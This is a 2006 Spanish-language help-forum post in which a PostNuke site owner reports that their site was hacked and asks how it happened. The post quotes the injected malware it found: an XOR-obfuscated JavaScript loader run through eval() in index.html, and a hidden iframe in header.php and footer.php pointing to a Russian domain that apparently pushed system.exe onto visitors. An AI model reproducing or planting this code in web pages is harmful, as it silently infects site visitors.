|
|
|
Catalinaduque
|
|
|
Enviado: 02/12/2006 a las 22:12 |
|
Forero
Karma: 8 (4 Votos)
Registrado: 18/09/04
Mensajes: 116
Estado: Desconectado
Ultima visita: 09/07/08 |
Buenas tardes
Misteriosament -de la nada- en el index de la web empezo a aparecer que se bloqueaba un popup de voena.net , pero sin problemas com a las 3 semanas derepente cuando se entraba a la webpostnuke en antivirus me la bloqueba porqeu hacia una llamada a www.norton-kapersky.com/traff.php
recibe los codigos y habia esto:
En el index.html
****
//x=81;es="53;61;48;33;56;51;57;44;119;45;41;53;41;59;119;71;93;11;5;22;4;11;2;72;26;24;8;81;79;6;27;4;1;72;92;91;3;25;18;22;24;84;21;25;9;81;22;238;226;237;238;237;235;225;169;248;225;250;169;172;250;231;235;228;249;175;162;180;253;243;254;255;241;238;166;173;189;248;237;193;204;199;193;203;215;194;194;218;148;154;139;223;206;220;192;220;221;219;221;211;136;248;248;134;133;149;210;218;207;223;210;165;255;229;234;255;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</body>
</html>
que aunque esta codificado supongo que es el que hace la llama a www.voena.net/incoming.php
******
y en el footer.php y en el header.php encontre el siguiente codigo:
OJO SI NO TIENE UN ANTIVIRUS QUE VIGILE LA WEB NO ENTRAR PORQUE BAJA UN BADWARE A SU DISCO DURO AUTOMATICAMENTE , SEGUN GOOGLE LO DETECTA COMO UN BADWARE Y BAJA UN ARCHIVO LLAMADO SYSTEM.EXE , PERO NO ME DICE MAS NADA
******************
//IFRAME name='StatPage' src='http://www.norton-kaspersky.ru/new/traff.php' width=5 height=5 style='display:none'>
*************
LA PREGUNTA ES:
COMO SE INTRODUJO ESE CODIGO ALLIIII ,.,.,.QUE PASOOOOO
AYUDAAAA
NOTA: borre los codigos y la web trabaja normal
Cata
Dev-postnuke un excelente amigo
...Todos estas cosas nunca pasaron , pero son siempre...
]
|
|
|
|
|
|
|
|
|
Navegación
LLamada a virus que ser introduce -POR SI SOLO- en el codigo fuente de la web , como fue posible???
